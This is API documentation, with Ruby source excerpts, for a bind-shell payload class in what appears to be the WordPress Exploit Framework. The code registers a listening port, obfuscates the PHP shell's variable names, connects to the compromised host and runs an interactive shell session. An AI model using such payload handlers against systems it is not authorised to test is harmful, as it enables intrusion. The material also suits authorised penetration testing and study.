Class: Wpxf::Payloads::BindPhp
Overview
A PHP shell bound to an IPv4 address.
Instance Attribute Summary collapse
Attributes included from Options
#datastore, #options
#queued_commands
Instance Method Summary
collapse
#execute_queued_commands, #start_socket_io_loop, #start_socket_read_loop, #start_socket_write_loop
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
#encoded, #enqueue_command, #escape_single_quotes, #generate_vars, #php_preamble, #random_var_name
Constructor Details
Returns a new instance of BindPhp.
13
14
15
16
17
18
19
20
21
22
23
24
|
# File 'lib/wpxf/payloads/bind_php.rb', line 13
def initialize
super
register_options([
PortOption.new(
name: 'lport',
required: true,
default: 1234,
desc: 'The port being used to listen for incoming connections'
)
])
end
|
Instance Attribute Details
#host ⇒ Object
Returns the value of attribute host.
93
94
95
|
# File 'lib/wpxf/payloads/bind_php.rb', line 93
def host
@host
end
|
Instance Method Details
#check(mod) ⇒ Object
26
27
28
29
30
31
32
|
# File 'lib/wpxf/payloads/bind_php.rb', line 26
def check(mod)
if mod.get_option('proxy')
mod.emit_warning 'The proxy option for this module is only used for '\
'HTTP connections and will NOT be used for the TCP '\
'connection that the payload establishes'
end
end
|
#cleanup ⇒ Object
89
90
91
|
# File 'lib/wpxf/payloads/bind_php.rb', line 89
def cleanup
self.queued_commands = []
end
|
#connect_to_host(event_emitter) ⇒ Object
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
# File 'lib/wpxf/payloads/bind_php.rb', line 42
def connect_to_host(event_emitter)
event_emitter.emit_info "Connecting to #{host}:#{lport}..."
socket = nil
error = ''
begin
socket = TCPSocket.new(host, lport)
rescue StandardError => e
error = e
end
event_emitter.emit_error "Failed to connect to #{host}:#{lport} #{error}" unless socket
socket
end
|
#constants ⇒ Object
80
81
82
|
# File 'lib/wpxf/payloads/bind_php.rb', line 80
def constants
{ 'port' => lport }
end
|
#lport ⇒ Object
34
35
36
|
# File 'lib/wpxf/payloads/bind_php.rb', line 34
def lport
normalized_option_value('lport')
end
|
#obfuscated_variables ⇒ Object
72
73
74
75
76
77
78
|
# File 'lib/wpxf/payloads/bind_php.rb', line 72
def obfuscated_variables
super +
[
'cmd', 'disabled', 'output', 'handle', 'pipes', 'fp',
'port', 'scl', 'sock', 'ret', 'msg_sock', 'r', 'w', 'e'
]
end
|
#post_exploit(mod) ⇒ Object
57
58
59
60
61
62
63
64
65
66
67
68
69
70
|
# File 'lib/wpxf/payloads/bind_php.rb', line 57
def post_exploit(mod)
socket = connect_to_host(mod)
return false unless socket
Wpxf.change_stdout_sync(true) do
mod.emit_success 'Established a session'
start_socket_io_loop(socket, mod)
socket.close
puts
mod.emit_info "Disconnected from #{host}:#{lport}"
end
true
end
|
#prepare(mod) ⇒ Object
38
39
40
|
# File 'lib/wpxf/payloads/bind_php.rb', line 38
def prepare(mod)
self.host = mod.get_option_value('host')
end
|